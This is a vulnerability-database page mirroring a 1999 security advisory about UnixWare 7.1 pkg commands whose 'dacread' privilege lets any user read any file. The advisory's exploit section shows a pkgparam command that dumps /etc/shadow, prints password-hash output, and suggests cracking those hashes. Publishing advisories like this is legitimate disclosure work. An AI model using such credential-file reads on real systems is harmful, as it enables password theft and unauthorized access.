Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

unixware.pkg.txt

🗓️ 06 Dec 1999 00:00:00Reported by Brock TellierType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

UnixWare allows any user to read files due to vulnerabilities in pkg commands and privilege settings.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Greetings,  
  
OVERVIEW  
Any user may read any file on the system.  
  
BACKGROUND  
Only UnixWare 7.1 has been tested.  
  
DETAILS  
As previously stated, UnixWare binaries gain additional privileges via  
standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare  
"pkg" command, such as pkginfo, pkgcat, pkgparam, etc, are vulnerable to   
a bug  
which will allow any user to read any file on the system as a result of their  
additional "dacread" permission in the privs file.  
  
The dacread permission allows a process to override the Discretionary Access  
Controls (DAC) for read-only operations. Basically, a process with the  
dacread permissions is able to bypass the mode bits and ownership on a file,  
but only for reading it. A process with dacwrite permissions can bypass mode  
bits to write to or execute that file.  
  
I'm pretty sure that the bugs I found in the pkg commands were introduced by  
their addition to the privs file. As far as I can tell, there is virtual ly no  
reason for them to be able to read any file on the system.   
  
  
All around, this additional privilege thing, well, sucks. Consider now that  
the truss(1) command will allow the user to see any file i/o that happens  
  
between a process and the system since it isn't suid/sgid. Thus, if there is  
*any* way that you can make pkg* read from a file, even if the output is never  
printed, you can examine truss output to get the file's contents.  
  
EXPLOIT  
The worst offender of pkg* is pkgparam, which will print the contents of a  
file to stdout, though I've been able to get most of the pkg program to read  
from /etc/shadow in one way or another and grab the contents with truss.  
  
bash-2.02$ ls -la /bin/pkgparam  
-r-xr-xr-x 1 root sys 166784 May 21 1999  
/bin/pkgparam  
bash-2.02$ /bin/pkgparam -f /etc/shadow  
Dy0l3OC7XHsj.:10925::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
BgusHRQZ9MH2U:10878::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
nv.Xrh2V3vArc:10882::::::  
ozT.yeRe1/dxY:10882::::::  
RinwpQfqabYbc:10928::::::  
bash-2.02$   
  
Now just concatenate the first field of /etc/passwd with this file and run  
your favorite cracker.  
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
06 Dec 1999 00:00Current
unixware 7.1file accessprivilege escalationbug exploitationdiscretionary access controlspkg commandstruss command/etc/shadow.
31
.json
Report